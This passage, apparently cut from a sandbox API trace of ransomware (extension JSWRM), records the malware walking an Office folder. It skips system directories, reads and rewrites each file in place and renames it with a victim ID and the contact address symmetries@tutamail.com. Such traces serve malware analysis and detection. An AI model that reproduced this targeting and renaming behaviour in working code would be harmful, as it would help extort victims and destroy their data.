hHeap=0x1e0000) returned 1 [0138.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0138.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0138.999] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d5a1d84, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d5a1d84, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d5a1d84, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2b6c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL109.XML", cAlternateFileName="")) returned 1 [0139.000] lstrcmpiW (lpString1="PGLBL109.XML", lpString2=".") returned 1 [0139.000] lstrcmpiW (lpString1="PGLBL109.XML", lpString2="..") returned 1 [0139.000] lstrcmpiW (lpString1="PGLBL109.XML", lpString2="...") returned 1 [0139.000] lstrcmpiW (lpString1="PGLBL109.XML", lpString2="windows") returned -1 [0139.000] lstrcmpiW (lpString1="PGLBL109.XML", lpString2="recovery") returned -1 [0139.000] lstrcmpiW (lpString1="PGLBL109.XML", lpString2="perflogs") returned 1 [0139.000] lstrcmpiW (lpString1="PGLBL109.XML", lpString2="documents and settings") returned 1 [0139.000] lstrcmpiW (lpString1="PGLBL109.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.000] lstrcmpiW (lpString1="PGLBL109.XML", lpString2="system volume information") returned -1 [0139.000] lstrcmpiW (lpString1="PGLBL109.XML", lpString2="msocache") returned 1 [0139.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0139.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL109.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL109.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL109.XML", lpUsedDefaultChar=0x0) returned 12 [0139.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0139.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0139.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL109.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL109.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL109.XML", lpUsedDefaultChar=0x0) returned 12 [0139.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0139.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0139.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0139.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0139.000] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL109.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl109.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.001] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11116) returned 1 [0139.001] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b60) returned 0x27b348 [0139.001] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2b60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x2b60, lpOverlapped=0x0) returned 1 [0139.003] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.003] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2b60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x2b60, lpOverlapped=0x0) returned 1 [0139.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0139.004] CloseHandle (hObject=0x238) returned 1 [0139.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0139.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0139.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0139.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0139.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0139.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0139.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0139.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0139.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0139.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0139.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0139.004] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0139.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0139.004] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0139.004] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL109.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl109.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL109.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl109.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0139.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0139.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0139.005] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d5a1d84, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d5a1d84, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d7457f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcdbee, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL110.XML", cAlternateFileName="")) returned 1 [0139.005] lstrcmpiW (lpString1="PGLBL110.XML", lpString2=".") returned 1 [0139.005] lstrcmpiW (lpString1="PGLBL110.XML", lpString2="..") returned 1 [0139.005] lstrcmpiW (lpString1="PGLBL110.XML", lpString2="...") returned 1 [0139.005] lstrcmpiW (lpString1="PGLBL110.XML", lpString2="windows") returned -1 [0139.005] lstrcmpiW (lpString1="PGLBL110.XML", lpString2="recovery") returned -1 [0139.006] lstrcmpiW (lpString1="PGLBL110.XML", lpString2="perflogs") returned 1 [0139.006] lstrcmpiW (lpString1="PGLBL110.XML", lpString2="documents and settings") returned 1 [0139.006] lstrcmpiW (lpString1="PGLBL110.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.006] lstrcmpiW (lpString1="PGLBL110.XML", lpString2="system volume information") returned -1 [0139.006] lstrcmpiW (lpString1="PGLBL110.XML", lpString2="msocache") returned 1 [0139.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0139.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL110.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL110.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL110.XML", lpUsedDefaultChar=0x0) returned 12 [0139.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0139.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0139.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL110.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL110.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL110.XML", lpUsedDefaultChar=0x0) returned 12 [0139.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0139.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0139.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0139.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0139.006] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL110.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl110.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.007] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=842734) returned 1 [0139.007] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0139.007] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0139.025] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.025] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0139.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0139.026] CloseHandle (hObject=0x238) returned 1 [0139.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0139.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0139.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0139.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0139.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0139.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0139.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0139.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0139.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0139.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0139.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0139.027] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0139.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0139.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0139.027] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL110.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl110.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL110.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl110.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0139.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0139.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0139.029] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d3659fb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d3659fb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1fc39fa2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x40198, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL111.XML", cAlternateFileName="")) returned 1 [0139.029] lstrcmpiW (lpString1="PGLBL111.XML", lpString2=".") returned 1 [0139.029] lstrcmpiW (lpString1="PGLBL111.XML", lpString2="..") returned 1 [0139.029] lstrcmpiW (lpString1="PGLBL111.XML", lpString2="...") returned 1 [0139.029] lstrcmpiW (lpString1="PGLBL111.XML", lpString2="windows") returned -1 [0139.029] lstrcmpiW (lpString1="PGLBL111.XML", lpString2="recovery") returned -1 [0139.030] lstrcmpiW (lpString1="PGLBL111.XML", lpString2="perflogs") returned 1 [0139.030] lstrcmpiW (lpString1="PGLBL111.XML", lpString2="documents and settings") returned 1 [0139.030] lstrcmpiW (lpString1="PGLBL111.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.030] lstrcmpiW (lpString1="PGLBL111.XML", lpString2="system volume information") returned -1 [0139.030] lstrcmpiW (lpString1="PGLBL111.XML", lpString2="msocache") returned 1 [0139.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0139.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL111.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL111.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL111.XML", lpUsedDefaultChar=0x0) returned 12 [0139.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0139.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0139.031] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL111.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.031] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL111.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL111.XML", lpUsedDefaultChar=0x0) returned 12 [0139.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0139.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0139.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0139.031] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0139.031] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0139.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0139.031] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL111.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl111.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0139.032] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=262552) returned 1 [0139.032] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0139.032] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0139.045] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.045] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0139.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0139.046] CloseHandle (hObject=0x238) returned 1 [0139.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0139.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0139.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0139.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0139.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0139.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0139.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0139.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0139.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0139.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0139.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0139.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0139.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0139.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0139.046] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL111.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl111.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL111.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl111.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0139.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0139.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0139.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0139.047] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d5a1d84, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d5a1d84, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d5a1d84, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x789e2, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL112.XML", cAlternateFileName="")) returned 1 [0139.047] lstrcmpiW (lpString1="PGLBL112.XML", lpString2=".") returned 1 [0139.047] lstrcmpiW (lpString1="PGLBL112.XML", lpString2="..") returned 1 [0139.047] lstrcmpiW (lpString1="PGLBL112.XML", lpString2="...") returned 1 [0139.047] lstrcmpiW (lpString1="PGLBL112.XML", lpString2="windows") returned -1 [0139.047] lstrcmpiW (lpString1="PGLBL112.XML", lpString2="recovery") returned -1 [0139.048] lstrcmpiW (lpString1="PGLBL112.XML", lpString2="perflogs") returned 1 [0139.048] lstrcmpiW (lpString1="PGLBL112.XML", lpString2="documents and settings") returned 1 [0139.048] lstrcmpiW (lpString1="PGLBL112.XML", lpString2="$RECYCLE.BIN") returned 1 [0139.048] lstrcmpiW (lpString1="PGLBL112.XML", lpString2="system volume information") returned -1 [0139.048] lstrcmpiW (lpString1="PGLBL112.XML", lpString2="msocache") returned 1 [0139.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0139.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL112.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0139.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL112.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, 